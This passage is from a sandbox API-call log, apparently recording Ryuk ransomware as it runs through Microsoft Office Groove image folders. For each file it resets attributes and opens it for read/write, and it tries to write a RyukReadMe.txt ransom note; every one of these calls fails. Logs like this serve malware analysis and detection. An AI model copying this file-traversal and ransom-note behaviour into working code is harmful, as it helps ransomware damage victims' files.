(lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_SlateBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_slateblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.968] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.968] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.968] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.968] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.969] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_TexturedBlue.gif", dwFileAttributes=0x80) returned 0 [0136.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_TexturedBlue.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_texturedblue.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.969] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.969] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.969] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_VelvetRose.gif", dwFileAttributes=0x80) returned 0 [0136.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\bg_VelvetRose.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\bg_velvetrose.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.970] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.970] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.970] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.970] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.970] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left.gif", dwFileAttributes=0x80) returned 0 [0136.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.971] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.971] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.971] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.971] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.971] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_disable.gif", dwFileAttributes=0x80) returned 0 [0136.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left_disable.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.972] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.972] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.972] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.972] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_over.gif", dwFileAttributes=0x80) returned 0 [0136.973] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_left_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_left_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.973] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid.gif", dwFileAttributes=0x80) returned 0 [0136.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.974] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.974] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_disable.gif", dwFileAttributes=0x80) returned 0 [0136.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid_disable.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.975] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_over.gif", dwFileAttributes=0x80) returned 0 [0136.975] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_mid_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_mid_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.975] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.975] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.975] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.975] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif", dwFileAttributes=0x80) returned 0 [0136.976] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.976] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.976] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.976] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.976] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif", dwFileAttributes=0x80) returned 0 [0136.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_disable.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_disable.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.977] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.977] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.977] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif", dwFileAttributes=0x80) returned 0 [0136.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right_over.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right_over.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.977] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.977] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.977] FindNextFileW (in: hFindFile=0x3b4940, lpFindFileData=0x29ab380 | out: lpFindFileData=0x29ab380) returned 1 [0136.977] SetLastError (dwErrCode=0x0) [0136.977] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.978] GetLastError () returned 0x5 [0136.978] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ab330, lpOverlapped=0x0) returned 0 [0136.978] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.978] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\*.*", lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 0x3b49a0 [0136.979] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.980] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\Attachments.jpg", dwFileAttributes=0x80) returned 0 [0136.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\Attachments.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\attachments.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.980] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.980] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.980] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.980] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.980] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BREAK.JPG", dwFileAttributes=0x80) returned 0 [0136.980] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BREAK.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\break.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.981] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.981] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.981] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.981] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.981] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BUTTON.JPG", dwFileAttributes=0x80) returned 0 [0136.981] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\BUTTON.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\button.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.982] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.982] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CHECKBOX.JPG", dwFileAttributes=0x80) returned 0 [0136.982] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CHECKBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\checkbox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.982] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.982] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.982] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.982] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\COMBOBOX.JPG", dwFileAttributes=0x80) returned 0 [0136.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\COMBOBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\combobox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.983] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.983] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.983] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CONTACT.JPG", dwFileAttributes=0x80) returned 0 [0136.983] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CONTACT.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\contact.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.983] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.983] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.984] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CURRENCY.JPG", dwFileAttributes=0x80) returned 0 [0136.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\CURRENCY.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\currency.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.984] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.984] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.984] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.984] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATE.JPG", dwFileAttributes=0x80) returned 0 [0136.984] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\date.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.985] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.985] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.985] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATETIME.JPG", dwFileAttributes=0x80) returned 0 [0136.985] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DATETIME.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\datetime.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.985] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.985] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.985] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.985] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.985] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DigitalInk.jpg", dwFileAttributes=0x80) returned 0 [0136.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\DigitalInk.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\digitalink.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.986] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.986] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\EmbeddedView.jpg", dwFileAttributes=0x80) returned 0 [0136.986] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\EmbeddedView.jpg" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\embeddedview.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.986] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.986] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.986] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.986] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\HEADING.JPG", dwFileAttributes=0x80) returned 0 [0136.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\HEADING.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\heading.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.987] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.987] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.987] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\IMAGE.JPG", dwFileAttributes=0x80) returned 0 [0136.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\IMAGE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\image.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0136.987] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0136.987] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0136.987] FindNextFileW (in: hFindFile=0x3b49a0, lpFindFileData=0x29aabd0 | out: lpFindFileData=0x29aabd0) returned 1 [0136.988] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0136.988] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LINE.JPG", dwFileAttributes=0x80) returned 0 [0136.988] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\LINE.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\line.jpg"), 